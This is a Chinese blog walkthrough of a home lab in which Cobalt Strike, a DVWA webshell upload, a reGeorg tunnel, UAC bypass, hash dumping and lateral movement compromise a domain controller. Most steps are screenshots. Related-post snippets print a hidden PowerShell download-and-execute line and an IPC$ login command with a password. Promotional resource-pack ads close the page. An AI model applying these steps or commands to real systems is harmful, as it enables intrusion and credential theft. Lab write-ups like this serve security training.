【内网安全】搭建网络拓扑,CS内网横向移动实验

于 2024-08-17 11:00:00 发布
阅读量999 收藏 20
点赞数 27
文章标签: 安全 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59598029/article/details/141256629
版权
文章目录
  • 搭建网络拓扑 ☁
  • 环境
  • CS搭建,木马生成
  • 上传一句话,获取WebShell
  • CS上线
  • reGeorg搭建代理,访问内网域控IIS
  • 提权
  • 信息收集
  • 横向移动

实验拓扑结构如下:

搭建网络拓扑 ☁

![image-20231020161801312](https://img-
blog.csdnimg.cn/img_convert/bf00a422107c703544209de0633fd9c2.png)

环境

**攻击者win10地址:**192.168.8.3

dmz win7地址: 10.9.75.49 172.16.1.1

**DC server2008地址:**172.16.1.254

CS服务器 kali: 10.9.75.171

CS搭建,木马生成

1、搭建CS服务器,CS客户端连接

![image-20231020162700951](https://img-
blog.csdnimg.cn/img_convert/48bf13d9307386f19c069ace6ed4f135.png)

攻击者充当CS客户端连接

![image-20231020162819534](https://img-
blog.csdnimg.cn/img_convert/4ce9e1b05fe7e345500d901e6918d3c1.png)

开启监听

![image-20231020162904629](https://img-
blog.csdnimg.cn/img_convert/76257e849ba8bbf4d983292629295ddc.png)

生成木马

![image-20231020162942793](https://img-
blog.csdnimg.cn/img_convert/5af8fc4463696983a19fb73c26780291.png)

![image-20231020162958609](https://img-
blog.csdnimg.cn/img_convert/ed854a2380fbff214794c7b9b525efc1.png)

![image-20231020163039106](https://img-
blog.csdnimg.cn/img_convert/9083bee952ce73ac27c9df72a5fd1899.png)

上传一句话,获取WebShell

攻击者win10

攻击者访问dmz的Web服务器,上传一句话木马,蚁剑连接

![image-20231019193005662](https://img-
blog.csdnimg.cn/img_convert/57879d0398253875f05a4d2fa6a6c64e.png)

浏览器访问http://10.9.75.49/dvwa/hackable/uploads/1.php,触发一句话

![image-20231020163642195](https://img-
blog.csdnimg.cn/img_convert/3519fa12e0003802ab2fc2136a91cc4d.png)

![image-20231020163704494](https://img-
blog.csdnimg.cn/img_convert/2d6527f72e2f4d37b06cdd8322a8bdcb.png)

![image-20231020163805964](https://img-
blog.csdnimg.cn/img_convert/5e3de2ecd6213b6559e0a23a7e080443.png)

CS上线

攻击者win10

利用哥斯拉上传CS木马

![image-20231020163952418](https://img-
blog.csdnimg.cn/img_convert/24dd1467a03a2e505b15d613d7eb6614.png)

![image-20231020164032176](https://img-
blog.csdnimg.cn/img_convert/7744ef86c1c643abe476255bef45f818.png)

![image-20231020164047092](https://img-
blog.csdnimg.cn/img_convert/79b56b84809fe7f4791e90e1502a6adb.png)

成功上线

reGeorg搭建代理,访问内网域控IIS

攻击者win10

通过哥斯拉上传tunnel.nosocket.php到dmz web服务端

![image-20231020164603272](https://img-
blog.csdnimg.cn/img_convert/41ee1568934a9faf8d6043e0460224fc.png)

![image-20231020164626268](https://img-
blog.csdnimg.cn/img_convert/826e11eda8dc3c19364e79263fa8fe35.png)

代理服务端

![image-20231020165022541](https://img-
blog.csdnimg.cn/img_convert/3f279fdf84e218dea2568473f1e6abea.png)

tunnel.nosocket.php在谁身上,就是以谁的身份去访问,上一步已经把这个文件上传到了dmz,那么就可以以dmz的身份去访问域控的IIS服务

代理客户端设置

![image-20231020164848400](https://img-
blog.csdnimg.cn/img_convert/79efb5ac42cdd6333eebddbc4e39c202.png)

客户端开启代理

![image-20231020165212822](https://img-
blog.csdnimg.cn/img_convert/5945706703472392584d7e0f06141cb6.png)

访问内网IIS服务

![image-20231020170241535](https://img-
blog.csdnimg.cn/img_convert/ca93501ea7f55d4240fca80c7ac8f62e.png)

提权

攻击者win10

![image-20231020170826257](https://img-
blog.csdnimg.cn/img_convert/fd096bb8a992567f86c1099bd1e3674e.png)

![image-20231020170905181](https://img-
blog.csdnimg.cn/img_convert/83b426b5a9c5e80f9651b029c0080355.png)

默认心跳是60秒 sleep 2

先绕过uac

![image-20231020173726170](https://img-
blog.csdnimg.cn/img_convert/2bececed3375f092557e6124a1ecd47d.png)

然后再提权

![image-20231020173855954](https://img-
blog.csdnimg.cn/img_convert/b0015660a6386c6b10cab060ebfc8dd4.png)

信息收集

dump hash

![image-20231020174054470](https://img-
blog.csdnimg.cn/img_convert/7ae3f613a86024d11361c45293b07d74.png)

![image-20231020174117074](https://img-
blog.csdnimg.cn/img_convert/67a833d97b832a3b1f653d8b9783da3e.png)

查看是否在域内

![image-20231020200045686](https://img-
blog.csdnimg.cn/img_convert/825f832ab942c94880aa503e8b704866.png)

查询当前的登录域与用户信息shell net config workstation

![image-20231020200314860](https://img-
blog.csdnimg.cn/img_convert/b6f1362fa27257208884441fe45c2a0b.png)

用 ping 即可反查出域控ip

![image-20231020200404605](https://img-
blog.csdnimg.cn/img_convert/5cc6ba2504dd1a10f4b13a90ad138267.png)

端口扫描

端口范围可自定义

![image-20231020174442389](https://img-
blog.csdnimg.cn/img_convert/4c776640243215e5df8418039ae60056.png)

![image-20231020174508633](https://img-
blog.csdnimg.cn/img_convert/c94bd7288d361b2a1247f7f71259fe61.png)

![image-20231020174730329](https://img-
blog.csdnimg.cn/img_convert/40e7f7a0416a4326d75de663cb384285.png)

发现了内网出了172.16.1.1之外,还有172.16.1.254存活

横向移动

![image-20231020175611007](https://img-
blog.csdnimg.cn/img_convert/d40e70878b5e7c79409de8361b1598aa.png)

![image-20231020175726336](https://img-
blog.csdnimg.cn/img_convert/ad2023b4bcf7a8bc9728805251b953cf.png)

![image-20231020175923339](https://img-
blog.csdnimg.cn/img_convert/488c387323989b5cf3a857966f1e471e.png)

最后

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

扫码领取

# 学习计划安排

我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

教IT的小强
关注
内网渗透,横向移动总结(mimikatz域控)
墨痕诉清风的博客
08-23 2984
前言 通常我们在渗透过程中从外围打点进入内网后拿到主机提升到system权限,这一台主机就已经拿下。但是我们进入内网的目标还是拿下尽可能多的主机,这时候选择横向移动的方法就尤为重要。今天就对一些常用的横向手法进行一个总结,有不足之处欢迎师傅们进行斧正。 本次实验均在本地搭建靶场进行,靶场拓扑图如下: 利用windows远程连接命令 ipc连接 IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的
忆享科技戟星安全实验室|内网渗透神器-Viper的基本使用
m0_61431042的博客
08-19 1957
viper提供图形化的操作界面,用户使用浏览器即可进行内网渗透,内置70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类。
内网横向渗透神器-CS
qq_39756628的博客
06-22 2501
简介: Cobaltstrike是内网横向渗透中团队作战神器,也被称为CS,目前已有4.1版本,本文这里提供v4.0下载链接:https://gitee.com/yaogodv/cobaltstrike4.0/tree/master/cobaltstrike4.0 一、CS服务器启动: 以本地kali(192.168.3.134)为服务器,进入相应目录,直接运行: ./teamserver 192.168.3. 134 ztf 二、本地客户端连接: 直接启动start.bat,需要有java的环境,没
cs内网横向的使用(靶机)
sweetie 的博客
11-02 1630
1.cs上线目标 (1)设置监听器 添加监听 (2) 上线目标 如果目标可以出外网,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块 根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口 复制代码(这里要选择x64的payload) powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"
内网安全横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动
今天是几号的博客
03-25 1932
简单使用ms14-058提权后,得到sysytem权限。IPC是专用管道,可以实现对远程计算机的访问, 需要使用目标系统用户的账号密码,使用139、445端口。 1. 建立IPC链接到目标主机 2. 拷贝要执行的命令脚本到目标主机 3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本 4. 删除IPC链接 常用ipc命令总结 net use \\192.168.3.32\ipc$ "Admin12345" /user:god.org\administrator #新建连接 net
内网安全】——CS操作指南(一)
qq_53058639的博客
01-26 380
作者名:白昼安全主页面链接:创作初心: 一切为了她座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日emo: 再让我多赚一点——《血战网安岭》!CS 是CobaltStrike的简称,是一款神器,常被业界人称为CS神器。CobaltStrike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
不出网上线CS的各种姿势(内网横向
最新发布
qq_64395221的博客
06-21 1481
内网环境中可以使用ipc $生成的SMB Beacon上传到目标主机执行,但是目标主机并不会直接上线的,需要我们自己用链接命令(link <ip>)去连接它。经常是拿下一台边缘机器,其有多块网卡,用于连接内外网,内网机器都不出网。因为连接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。一样,建立pystinger连接之后,直接生成payload在业务主机执行,业务内网主机192.168.111.236即可成功上线。
内网安全:隧道技术详解
zz12345600354的博客
04-29 1044
Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。
2024年网安最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84252281的博客
05-03 1787
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
内网渗透--对不出网目标的打法
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 1639
配置网络 在VM虚拟机中按照下边的网络拓扑进行配置网络。网络拓扑图如下: win7具有双网卡,其中外网ip是192.168.8.133,内网网段是52。三台机器彼此互通,但是win server 2008和win2003不通外网。用我mac作为攻击机,来对这个靶场环境进行渗透测试。 外网打点 在win7这台靶机上,使用PHPStudy让网站可以运行起来。在攻击机上,访问http://192.168.8.133可以看到是一个phpStudy 探针。对这网站进行渗透,因为本文主要写在内网渗透过程..
内网渗透之MSF&CS
weixin_54855337的博客
02-18 905
内网渗透,流量转发,隧道搭建
内网安全】代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
今天是几号的博客
03-18 1900
先将msf代理流量转发至本地1234端口,然后使用代理工具连接该端口,进行流量转发。注意:实验之前查看靶机操作系统是否是64位,否则使用msf生成x84架构的木马。SocksCap Proxifier ProxyChains等。忽略细节,将msf_7777放置windows 7上,直接上线。#网络通讯-MSF&CS-路由添加&节点建立。#控制上线-MSF&CS-协议生成&正反连接。监听器:bind_tcp port。操作:代理转发-Socks代理。msf 内网流量转发代理。cs 内网流量转发代理。
内网安全:代理技术详解
qq_61553520的博客
06-03 9142
本篇将介绍在内网攻防中经常用到的代理技术,正向连接,反向连接。
【5G】5G网络架构及网元功能
热门推荐
qq_41127869的博客
03-07 1万+
5G主要网络架构及主要网元功能划分。
VoLTE网络各节点功能介绍
qq_44390640的博客
07-23 7674
1 VoLTE网络各节点功能介绍 1.1 S-CSCF S-CSCF是IMS的核心所在,它位于归属网络,为UE进行会话控制和注册请求,但当UE处于会话中 时,S-CSCF处理网络中的会话状态。在同一个运营商的网络中,可以有多个S-CSCF。S-CSCF执行的功 能包括: • 作为注册服务器,对来自UE的注册请求消息进行处理 • 与归属用户服务器的交互,完成对用户的认证和鉴权,更新归属用户服务...
内网工具 CS的基础使用
m0_57856283的博客
03-12 7227
1 powershell 技术 1.1powershell 简介 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。 Windows PowerShell v3 将伴随着 Microsoft Hyper-V 3.0 和 Windows...
内网安全学习从入门到入狱-神器-Cobalt Strike-一-CS的基础和介绍
god_Zeo的安全博客
03-06 2423
内网安全学习从入门到入狱-工具-CS基础.md 前言 本文主要是看了 Cobalt Strike 各种资料后记的笔记。 参考过于杂乱,如有问题请联系我 手上虽然没有4.0 ,但是也要提前学习了 Cobalt Strike简介 官网收费软件 https://www.cobaltstrike.com/,Cobalt Strike许可费用为每位用户3500美元,其他的不说了 Coba...
.企业内网规划图 1.1搭建网络拓扑
06-08
企业内网规划图的搭建需要根据企业的具体需求和实际情况进行设计。...在搭建网络拓扑图时,需要注意网络的可扩展性、可靠性、安全性和性能等方面的问题,确保网络能够满足企业的业务需求和安全需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值